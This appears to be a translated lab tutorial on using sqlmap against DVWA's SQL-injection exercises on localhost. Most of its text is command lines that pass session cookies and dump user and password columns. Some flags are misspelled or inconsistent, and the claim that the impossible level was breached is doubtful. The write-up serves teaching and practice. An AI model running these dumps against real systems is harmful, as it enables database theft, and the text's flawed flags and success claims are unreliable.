Table of contents
1. Sqlmap
1 Introduction
Sqlmap is an automated SQL injection tool. Its main function is to scan, find and exploit SQL injection vulnerabilities in a given URL. The currently supported databases are MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite , Firebird, Sybase and SAP MaxDB.
Five unique SQL injection techniques are employed, namely:
- Boolean-based blind injection, that is, the injection that can judge whether the condition is true or false according to the returned page.
- Blind injection based on time, that is, you cannot judge any information based on the content returned by the page, and use conditional statements to check whether the time delay statement is executed (that is, whether the page return time has increased).
- Based on error injection, that is, the page will return an error message, or directly return the result of the injected statement to the page.
- Joint query injection can be injected in the case of union.
- Heap query injection, which can execute the injection of multiple statements at the same time.
2. Basic steps
View the relevant parameters of sqlmap, the command format is: sqlmap -h
Find an available website, determine the website database type, the command format is: sqlmap -u
After confirming that the database type is mysql, check the existing database, the command format is: sqlmap -u Target URL – dbs
View the tables existing in the database, the command format is: sqlmap -u target URL –tables -D database name
to get the fields in the table, the command format is: sqlmap -u target URL – columns -T table name -D database Guess the name
to extract the field and view the storage content in the table. The command format is: sqlmap -u target URL – dump -C field name-T table name-D database name
Before that, there are a few little knowledge points
sqlmap requires us to enter parameters, the most important of which is the target address of SQL injection. First of all, it is necessary to judge whether the target address of the test needs to log in. If it needs to log in, pass the login Cookie as a parameter to sqlmap.
python sqlmap.py -u "target address" --cookie="cookie value" --batch
–batch is used to indicate automatic operation, otherwise each step needs to be confirmed;
–current-bd to view the current database name
-D DB to specify DBMS database to enumerate
-T TBL specifies the DBMS data table to enumerate
-C COL specifies the DBMS data column to enumerate
-X EXCLUDECOL specifies the DBMS data column to exclude
-U USER specifies the DBMS user to enumerate
3. command
sqlmap.py -u "http://xxx//" --batch
sqlmap.py -u "http://xxx//" --cookie="获取的cookie"
#查询数据库
sqlmap.py -u "http://xxx//" --cookie="获取的cookie" -dbs
#查看dvwa数据库的表
sqlmap.py -u "http://xxx//" --cookie="获取的cookie" -D data -tables
#查看表中的字段名
sqlmap.py -u "http://xxx//" --cookie="获取的cookie" -D data -T users --columns
#获取字段的信息
sqlmap.py -u "http://xxx//" --cookie="获取的cookie" -D data -T users -C user,password --dump
2. SQL Injection
1.low
We enter id=1 to get the URL url
sqlmap performs sql injection and checks the information.
sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --batch
It is found that login is required, and cookies are obtained on the web page.
view database
sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -dbs
View the tables of the dvwa database
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -tables
View the field names in the table
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users --columns
Get field information
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users -C user,password --dump
You can see that the username and password have been queried by us.
2.Medium.
We enter id=1, url does not respond
We use burpsuit to capture and analyze the data submitted by post.
Here, the post method is used for transmission, so we need to use the --data parameter to import the data here
view information
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch
view database
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -dbs
View the tables under the dvwa database
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -tables
View field name
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users --columns
Get the information in the field
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users -C user,password --dump
3.high
We found that after clicking, we will jump to another page, so if we want to use sqlmap for blasting, we also need to introduce a knowledge point – second-order (second-order sql injection). Sometimes the data input at the injection point does not look at the returned
results It is not the current page, but another page. At this time, you need to specify which page to get the response to judge whether it is true or false.
--second-order is followed by a URL address to judge the page.
Use burpsuite to capture packets, because the value of post or get cannot be obtained on the page here.
sqlmap>python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch
The following is roughly the same as the low medium level
get data
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password --dump
4.impossible
Token verification is added to this level, and we use bp to capture packets to obtain
Run sqlmap, try it, and it succeeds.
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=f237dc0df1d6cdf589f09179a99fa7aa#" --cookie="security=impossible;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --batch
look at the data
python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=581a16aa4511d8c46a3ea1834973122a#" --cookie="security=impossible;PHPSESSID=0mcqc7ludqslr2se50lsaas3g0" --batch -D dvwa -T users -C user,password --dump